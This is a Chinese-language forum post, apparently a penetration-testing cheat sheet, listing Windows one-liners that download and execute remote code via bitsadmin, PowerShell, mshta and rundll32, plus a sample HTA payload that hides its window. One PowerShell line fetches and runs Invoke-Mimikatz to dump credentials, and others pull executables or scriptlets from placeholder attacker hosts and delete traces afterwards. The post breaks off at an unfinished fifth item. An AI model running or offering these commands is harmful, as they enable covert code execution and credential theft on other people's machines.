1.bitsadmin命令(只能命令下载到指定路径上,win7以上):

bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
bitsadmin /transfer d90f <http://site.com/a> %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe

2.powershell命名下载执行:(win7以上)

powershell IEX (New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>'); Invoke-Mimikatz
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe’,’C:\111111111111111.exe')
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')

3.mshta命令下载执行

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta

payload.hta

<HTML> 

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<HEAD> 

<script language="VBScript">

Window.ReSizeTo 0, 0

Window.moveTo -2000,-2000

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "calc.exe"

self.close

</script>

<body>

demo

</body>

</HEAD> 

</HTML>

4.rundll32命令下载执行

rundll32 \\webdavserver\folder\payload.dll,entrypoint


rundll32.exe  javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

参考:https://github.com/3gstudent/Javascript-Backdoor

5.net中的regasm命令下载执行

```

点击收藏 | 3 关注 | 0
登录 后跟帖